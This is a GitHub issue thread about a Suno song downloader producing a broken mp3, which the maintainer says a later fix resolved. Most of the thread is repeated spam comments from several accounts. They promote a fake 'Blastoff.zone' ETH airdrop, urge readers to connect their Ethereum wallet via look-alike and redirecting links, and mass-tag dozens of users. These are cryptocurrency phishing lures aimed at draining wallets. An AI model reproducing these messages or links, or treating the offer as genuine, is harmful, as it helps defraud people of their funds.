### ISSUE TITLE
Not working

### ISSUE THREAD

**Issue by happyTonakai** [tsui66/suno-ai-music#1]
The website does download a mp3 file given the share link but the mp3 file has 243 bytes size and cannot be open with any media player.

Here is the link I'm trying: https://app.suno.ai/song/a92b8380-f365-4ae4-9205-30b7e3db36c0/

**Comment by tsui66** [comment]
#2 fixed it

**Comment by taylorcammack** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
havocesp, @bostic112, @puresteelzhang, @KopylovVitalik, @sanerror, @ulopllo, @SoftDoggy, @huahuayu, @neolao, @kruzda, @alexjinchoi, @StafkaSztos, @draidin135730, @gunnark01, @Vito89, @longzekai, @CamonZ, @ali-master, @bmxer13, @divramod, @familyfriendlymikey, @xlciela, @mlj1991, @nkasco, @SuchExodus, @Jinjun1997, @scootcho, @DannnB, @ronzalo, @abe33556, @mihirchronicles, @fifiteen82726, @TheExper7, @hearsid, @gbaf, @QQOQ, @Whalz8, @gabpy, @alierenkara, @vikiszabo, @Weltolk, @ilkerispir, @mhaidarhanif, @dionyziz, @pecpwee, @gtxcnm, @atim8808, @MohamadKh75, @mirpo, @shantelray

**Comment by simonspg** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
XerxeLee, @KeeBeam, @htmcssjs, @myiwen, @ByteShake, @animegamer4422, @baikourin, @Chararu, @ladybody, @xfxcnlc, @movtiv, @romulowspp, @Hector-Chong, @gecko6r, @RockNety, @metanomad21, @jody-frankowski, @CaramelMario, @BugLoveKit, @CommaChan, @zyush, @Discolored, @nullovo, @guioum, @Xuan-1998, @clpi, @ARAapm, @reikolo, @awekling, @Vetreska, @AnneLau, @kamifr, @Y77CH, @Dandreholley, @Tianyi5337, @CoolUMe, @TipCAN, @Lilistore, @JeremyKinge, @serical, @Ping-Yeo, @ARweaver, @jtt1998, @520ph, @halcatt, @rixhabhftw, @Otamatune, @louis61619, @kaichen, @PX98

**Comment by simonspg** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
aivolcano, @Soft-Sugar, @JunQu, @paoyes, @daw3, @liyuanhao6, @FHCalvin, @nep-xion, @evrtwo, @lesenelir, @huakian, @next2your, @JacksonRed, @peterpme, @CoderManner, @dogeow, @bonifacio123, @jiangying000, @tatachu, @lxinlixin, @ceddybi, @qalqi, @TrustDec, @snowypeggy, @phankietit, @Tangjj1996, @SugarMoe, @isPrettyBoy, @shamine, @kallydev, @dorucioclea, @Daivv, @johnefemer, @luyl, @wongli233, @itsjoeyrighthere, @City40, @xieren58, @rrebase, @KANIKIG, @AyushAgrawal-A2, @hsyndeniz, @GoBGI, @AnTT197, @Kensingtonn, @esneko, @Ulanxx, @Plutoma, @DogActor, @Lycokie

**Comment by simonspg** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!

**Comment by joemansyahkemas** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
WangJiangJiaoZi, @ForBai, @kjd1000000, @Yogendra96, @ws2644, @Loveisweird, @GlamRing, @johnkks, @Avungard, @tracy-e, @18feb06, @GalvaNie, @hharzer, @uigleki, @4voice, @siko, @rikochyou, @PolymerLiu, @erics666, @Ciyfly, @aimtrx, @Lilistore, @XerxeLee, @BarracuDNN, @ahwgs, @nullptrx, @chahakshahcs5, @EchosYan, @xianhuawei, @wowcoo1, @BarnettW0ng, @theharshpat, @serical, @lintl97, @e-kiss-me, @coder-fang, @zjdMASTER, @jovicheng, @Acce1erat0rz, @tutan123, @memocong, @amorist, @stepbirt, @blockeis, @MarnoDev, @TipCAN, @nameishua, @jbjumbojb, @chengqianfan, @oneasai
